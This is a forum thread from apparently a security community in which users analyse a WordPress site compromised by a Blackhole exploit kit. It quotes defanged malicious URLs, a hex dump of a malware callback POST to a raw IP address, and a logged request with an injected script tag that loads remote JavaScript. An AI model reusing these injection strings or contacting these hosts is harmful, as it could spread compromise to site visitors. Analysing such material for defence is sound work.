Good that the site is being alerted by Google Safebrowsing as Phishing site: htxp://ftp.aziatische-ingredienten.nl/Dc16FpsG/index.html.
1 day ago we have this urlquery scan: http://urlquery.net/report.php?id=122720
Variety of Blackhole = EXP/JS.Blacole.BI and status = active since 2012-08-08 21:11:22 which avast will detect as JS:Redirector-RO [Trj]
Site is vulnerable via WP, WordPress version: WordPress 3.4.1
Wordpress version from source: 3.4.1
Wordpress Version 3.3 or 3.4 based on: htxp://ftp.aziatische-ingredienten.nl//wp-includes/js/autosave.js
WordPress theme: htxp://www.aziatische-ingredienten.nl/wp-content/themes/2010-weaver/
see:/^(htxp(s)?://)?ftp.aziatische-ingredienten.nl/
And from two days ago we have this ThreatExpert report: http://webcache.googleusercontent.com/search?q=cache:vxZvzj3H-7wJ:www.threatexpert.com/report.aspx%3Fmd5%3D54e4086d370ad757a647fa16ce05c0cd+/^(http(s)%3F:\/\/)%3Fftp.aziatische-ingredienten.nl/&cd=6&hl=nl&ct=clnk&gl=nl
About the poor reputation of the site: http://www.mywot.com/en/scorecard/ftp.aziatische-ingredienten.nl
info: [script] stats.wordpress dot com/e-201232.js
info: [decodingLevel=0] found JavaScript
suspicious: (cookie dependent)
polonus
Hi Polonus,
See:
00000000 | 504F 5354 202F 666F 7275 6D2F 7669 6577 | POST /forum/view
00000010 | 746F 7069 632E 7068 7020 4854 5450 2F31 | topic.php <b style="color:black;background-color:#ffff66">HTTP</b>/1
00000020 | 2E30 0D0A 486F 7374 3A20 3636 2E35 352E | .0..Host: 66.55.
00000030 | 3839 2E31 3438 0D0A 4163 6365 7074 3A20 | 89.148..Accept:
00000040 | 2A2F 2A0D 0A41 6363 6570 742D 456E 636F | */*..Accept-Enco
00000050 | 6469 6E67 3A20 6964 656E 7469 7479 2C20 | ding: identity,
00000060 | 2A3B 713D 300D 0A43 6F6E 7465 6E74 2D4C | *;q=0..Content-L
00000070 | 656E 6774 683A 2034 3536 0D0A 436F 6E6E | ength: 456..Conn
00000080 | 6563 7469 6F6E 3A20 636C 6F73 650D 0A43 | ection: close..C
00000090 | 6F6E 7465 6E74 2D54 7970 653A 2061 7070 | ontent-Type: app
000000A0 | 6C69 6361 7469 6F6E 2F6F 6374 6574 2D73 | lication/octet-<b style="color:black;background-color:#a0ffff">s</b>
000000B0 | 7472 6561 6D0D 0A43 6F6E 7465 6E74 2D45 | tream..Content-E
000000C0 | 6E63 6F64 696E 673A 2062 696E 6172 790D | ncoding: binary.
000000D0 | 0A55 7365 722D 4167 656E 743A 204D 6F7A | .User-Agent: Moz
000000E0 | 696C 6C61 2F34 2E30 2028 636F 6D70 6174 | illa/4.0 (compat
000000F0 | 6962 6C65 3B20 4D53 4945 2035 2E30 3B20 | ible; MSIE 5.0;
00000100 | 5769 6E64 6F77 7320 3938 290D 0A0D 0A43 | Windows 98)....C
Which can be shortened to this:
hXtp://66.55.89.148/forum/viewtopic.php
Notice the “application/octet-stream” and “Content-Encoding: binary”
Same url mentioned here:
http://webcache.googleusercontent.com/search?q=cache:VU3unpZszJEJ:www.threatexpert.com/report.aspx%3Fmd5%3D7437f140e46e7b8c10acb7855dad7eca+&cd=1&hl=en&ct=clnk&gl=us
Likely associated with different returns. Check my PM.
~!Donovan
Hi !Donovan,
Very valuable observations, my friend. Here something more about the method as how this manipulation is being wrought.
Yes, in fileviewer the location line in the header above has redirected the request to: htxp://genlarklin.com/
Alert found: //** Is your rel canonical tag pointing to another domain? WordPress issues on site…
EDIT Uri → htxp://genlarklin.com/xmlrpc.php?rsd → htxp://archipelago.phrasewise.com/rsd" (rsd version) + htxp://lloogg.com/l.js?c=131000824105e38
(this is in the path for Service Setting from Real Simple Discoverability) to Nullege a Framework Package used in the
so-called MoreOverbot hack attempt - analysis → example of googlebot manipulation:
GET /scriptdocument.write(unescape(%3Cscript%3Elloogg_clientid=%22211000209487386f%22%3C/script%3E%3Cscript%20src=%22htxp://lloogg.com/l.js%22%3E%3C/script%3E));/script HTTP/1.1" 301 5 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +htxp://www.google.com/bot.html)”
The application scripts will then deny requests with invalid characters in the query, and this as you said could give rise to manipulation
in the hands of the attackers,
polonus